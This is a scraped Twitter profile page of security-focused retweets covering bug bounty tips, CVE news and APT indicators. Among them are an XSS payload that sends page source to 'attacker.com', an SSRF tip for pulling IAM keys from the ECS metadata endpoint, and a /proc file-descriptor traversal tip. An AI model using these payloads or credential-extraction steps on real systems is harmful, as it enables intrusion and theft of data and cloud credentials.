Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
Blokirali ste korisnika/cu @alchu4n
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @alchu4n
-
0ks3iio proslijedio/la je Tweet
How to check DDOS attack with command-line on Linux https://meterpreter.org/how-to-check-ddos-attack-with-command-line-on-linux/ …
#info#news#techHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
Spaced repetition is a great way to remember things
Turn your notes into flashcards and learn at your own pace 
https://meow.ph/mochi Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
If you have an SSRF with file system access on an ECS instance then try extracting /proc/self/environ to get UUID and then try hitting ECS metadata curl http://169.254.170.2/v2/credentials/<UUID> This way you'll extract IAM keys of the attached role
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
It seems like everyone shipping Electron or CEF has made the mistake of leaving the debugger enabled at some point. I made a tiny command line application you can use to check.
https://github.com/taviso/cefdebug Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
A payload that steals source code of the current webpage without triggering browser restrictions, by
@s0md3v <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
Fuzzing URI's for sites that have SSO (okta) infront of them can yield some interesting results - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
Got a directory traversal? Don't forget to check out /proc/[0-9]*/fd/[0-9]* for more juicy info!
#infosec#bugbounty#bugbountytipspic.twitter.com/kS14RvNbZd
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
Actively exploited zero-day vulnerability found in Google Pixel, Huawei, Xiaomi, Samsung, and other deviceshttps://www.xda-developers.com/zero-day-security-vulnerability-active-exploit-google-pixel-huawei-xiaomi-samsung-others/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
Swift Apps Reverse Engineeringhttps://github.com/iOS-Reverse-Engineering-Dev/Swift-Apps-Reverse-Engineering …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
[CVE-2019-2215] critical unpatched zero-day vulnerability affecting the Android mobile operating system. Escalate privileges to gain root access to a vulnerable device. [poc.c] …https://00e9e64bac2d53fe420f7c6b0702b847a830a4e8470c46969c-apidata.googleusercontent.com/download/storage/v1/b/monorail-prod.appspot.com/o/26%2Fattachments%2Fc700ee47-ea4d-4825-a67e-ef785f011ccc?qk=AD5uMEtxm7d4E18RhqRQraMLOl6oh_gmsMI2O5PvXo5mHk4VNxAb77erVac8c3KSyRtugVEZuT8gvTJvWnVrAwU14gJ_fcnexxSUBUiVLMVmDNW_MnlnB4U_dZxElWsclib1R5YCLvQtdcssIIv6AKVi4RxNrSZ6cbdcJel7i9UxgyBRzgRgf_exdo9n8_iSR_njMMtajKo6pN7oe3O6KtWyXM3jqNc9XlPMjNNb94nosp6SURCOaY8HkT7cmsJ8PdIPZImQXKJ-WsX-UYVwrPxaViVZTjQN7UEFO7fL-n1ly7klkgPL6ilVpB5zTK1xOwwmQxhqZLuHPYeEbk4ldtC6ouY90R0qAlSnxBumFAk1v6kX5GopBtlXoRKwjDscsDk7kK3Q0W_qps3glU-8qfDytU8ZHBXfm6lBkCVwJZGlY23WjH5zA7C_EWCWF8ZQEJNskGn87_CdjhWitnEeKwiPAItijSmfHXPdHbCYjjYG4n58cJ5pOFxfBPIDQ8-S2d0KGgJ6fJoHeuRYl0Ut6rqNMsSKehIe1jeEl0TZUJC_BjqPUFnNwzRvz-TazvQV21KEBqO-rJ4LORuTMHPBJ62GrsNdXd2HJabaapbDnCrcI1fwXWFR-4EUssiM-Qxz-u6ioakyPeJ1HpojKlHB_5snPrWz1YlZG9nOiQ6Ecom4pgD0sClXn57PDeJWfU8A25cIrXIul3161Ui_nu1Z_cd3Qwv6f9zs5z13DJ7hNi6DqvI6ws9sqNKLusHtMORD26DHsAUOGyBtg1p76Kn-1madffBb_CY_hKEvjKjLHGkrng_OyKCx_kx1it2ce83mYuEB4R1SifoHu-lo1u8-0Wfo1LCku6xzzEYctQo1jzDZ2Mc_Et583tY … [uaf_test.c] https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414030 … https://bugs.chromium.org/p/project-zero/issues/detail?id=1942 …pic.twitter.com/t0pU2cYJoQ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
[CVE-2019-11184] NetCAT(Network Cache ATtack) Remotely leaking keystrokes from a victim SSH session Intel Xeon E5/E7v2 DDIO Does not require any malicious software Leak the arrival time of the corresponding packet. https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00290.html …pic.twitter.com/whXJFj96n1
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
A few people had issues figuring out how to use HTTP Request Smuggler, so I've posted step-by-step instructions on how to use it to solve an online
@WebSecAcademy lab:https://github.com/PortSwigger/http-request-smuggler#practice …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
Information Security related Mind Maps:- The full list:- https://www.amanhardikar.com/mindmaps.html pic.twitter.com/sqtu1ulfjp
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
GIF Image Could Have Hacked Your Android Phone Using WhatsApp CVE-2019-11932 Does not get triggered by sending a mal GIF file to a victim instead it gets executed when the victim itself simply opens the WhatsApp Gallery Pickerhttps://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
-
0ks3iio proslijedio/la je Tweet
「左耳朵耗子发自 https://weibo.com/1401880315/I9vMSk7vp …」【HTTP的前世今生】 最近 HTTP/3 被 Chrome,Firefox,和 Cloudflare支持,所以想写篇文章,简单地说一下HTTP的前世今生,说一下各个版本的重要特性。(行文仓𠉵,可能错误比较...https://coolshell.cn/articles/19840.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
#kimsuky#APT fontchk.dll db6edf104261faad52291b30c19ba148 yesterday submit from korean C2:http://eoplus.co.kr pic.twitter.com/oGr0wAW4kU
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
0ks3iio proslijedio/la je Tweet
Вызвать дьявола? Скучно... Зарядить телефон? Да!pic.twitter.com/wdlDAXFBtF
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0ks3iio proslijedio/la je Tweet
PuTTY 0.73 releases: security & bug fix https://meterpreter.org/putty/
#info#news#techHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.